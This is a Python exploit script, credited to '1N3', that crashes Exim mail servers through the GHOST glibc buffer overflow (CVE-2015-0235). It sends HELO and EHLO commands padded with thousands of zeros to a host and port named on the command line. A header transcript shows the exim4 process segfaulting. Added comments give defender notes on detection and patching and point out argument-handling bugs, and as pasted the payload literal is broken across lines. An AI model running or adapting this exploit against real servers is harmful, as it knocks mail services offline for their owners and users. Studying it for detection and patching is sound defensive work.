- #!/usr/bin/python
- # Exim ESMTP DoS Exploit by 1N3 v20150128
- # CVE-2015-0235 GHOST glibc gethostbyname buffer overflow
- # http://crowdshield.com
- #
- # USAGE: python ghost-smtp-dos.py <ip> <port>
- #
- # Escape character is '^]'.
- # 220 debian-7-7-64b ESMTP Exim 4.80 ...
- # HELO
- #
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 0000000000000000000000000000
- 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000
- # Connection closed by foreign host.
- #
- # user () debian-7-7-64b:~$ dmesg
- # ...
- # [ 1715.842547] exim4[2562]: segfault at 7fabf1f0ecb8 ip 00007fabef31bd04 sp 00007fffb427d5b0 error 6 in
- # libc-2.13.so[7fabef2a2000+182000]
- import socket
- import time
- import sys, getopt
- # main(argv): open a TCP connection to the SMTP host/port given on the command line,
- # read the banner, then send one HELO and one EHLO whose hostname argument is a very
- # long run of "0" characters, printing each server reply before closing the socket.
- #
- # Defender notes (grounded in the transcript in the header of this paste):
- #  * Effect on the unpatched host shown above: the exim4 process segfaults inside
- #    libc-2.13.so and the SMTP connection is dropped. A kernel log line of that shape
- #    for the MTA is a useful detection signal for CVE-2015-0235 probing.
- #  * On the wire the request is a HELO/EHLO whose argument is all digits and far longer
- #    than any legitimate hostname; SMTP front ends and IDS rules can reject or alert on
- #    oversized HELO/EHLO arguments.
- #  * Mitigation is the distribution's patched glibc, followed by a restart of every
- #    service that still has the old library mapped.
- #  * NOTE(review): per the public advisory for this CVE, Exim presumably reaches the
- #    vulnerable resolver call only when HELO verification is enabled
- #    (helo_verify_hosts, helo_try_verify_hosts, or a "verify = helo" ACL) -- confirm
- #    against the running configuration when assessing exposure.
- def main(argv):
- argc = len(argv)
- # Guard only requires one argument and the message names only <host>, although the
- # header documents <ip> <port> and argv[2] is read below.
- if argc <= 1:
- print "usage: %s <host>" % (argv[0])
- sys.exit(0)
- # This socket is replaced by a second socket.socket() call further down before use.
- s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- # Payload: a string of "0" characters. The literal is hard-wrapped across lines in this
- # paste, so its exact length cannot be read off the page; the script prints it at runtime.
- buffer =
- "000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 0000000000000000000000
- 00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
- 000000000000000000000000"
- target = argv[1] # SET TARGET
- port = argv[2] # SET PORT
- print "(--==== Exim ESMTP DoS Exploit by 1N3 - https://crowdshield.com"
- print "(--==== Sending GHOST SMTP DoS to " + target + ":" + port + " with length:"
- +str(len(buffer))
- s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
- # port arrives as a string from argv and is converted to int only here.
- connect=s.connect((target,int(port)))
- # First read is the server greeting (the "220 ... ESMTP Exim" line in the header transcript).
- data = s.recv(1024)
- print "CONNECTION: " +data
- # HELO with the oversized argument; one recv() of up to 1024 bytes for the reply.
- s.send('HELO ' + buffer + '\r\n')
- data = s.recv(1024)
- print "received: " +data
- # Same argument again via EHLO on the same connection.
- s.send('EHLO ' + buffer + '\r\n')
- data = s.recv(1024)
- print "received: " +data
- s.close()
- main(sys.argv)